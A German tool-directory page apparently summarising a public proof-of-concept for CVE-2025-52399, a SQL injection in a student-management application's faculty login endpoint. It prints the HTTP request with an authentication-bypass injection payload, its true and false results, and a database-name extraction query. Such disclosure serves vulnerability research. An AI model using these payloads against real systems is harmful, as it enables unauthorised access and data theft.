Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — Proof-of-Concept-Exploit für CVE-2025-52399, das eine SQL-Injection im loginlinkfaculty-Endpoint von Institute-of-Current-Students demonstriert und eine Authentifizierungsumgehung sowie Datenextraktion ermöglicht. | Kitploit
Tools/GitHubGitHub/userr404/cve-2025-52399-sqli-institute-of-current-students
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubuserr404/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

Proof-of-Concept-Exploit für CVE-2025-52399, das eine SQL-Injection im loginlinkfaculty-Endpoint von Institute-of-Current-Students demonstriert und eine Authentifizierungsumgehung sowie Datenextraktion ermöglicht.

Repository anzeigen
151vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-52399 - SQL-Injection in Institute of Current Students

Zusammenfassung

Der Endpunkt loginlinkfaculty in der Anwendung Institute-of-Current-Students ist anfällig für SQL-Injection über den POST-Parameter fid. Der Parameter wird vor der Verwendung in einer SQL-Abfrage nicht ordnungsgemäß bereinigt, sodass entfernte Angreifer beliebige SQL-Befehle ausführen können.

  • Schwachstellentyp: SQL-Injection
  • Betroffene Komponente: /loginlinkfaculty (POST)
  • Betroffener Parameter: fid
  • Authentifizierung: Nicht erforderlich
  • Auswirkung: Authentifizierungsumgehung, Datenextraktion
  • Getestet auf: Localhost
  • Datenbank: icsnew
  • Version: 1.0

PoC

HTTP-Anfrage

http POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+321=6+AND+000942=000942--&pass=example

Payload-Ergebnis

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → TRUE ❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSE

Datenbankextraktion

SELECT database(); -- returns 'icsnew'

Referenzen

  • CVE-2025-52399 (MITRE)
  • Verwundbare Anwendung
  • OWASP SQL Injection

Entdecker

Isroil Mustafoqulov

Tool herunterladen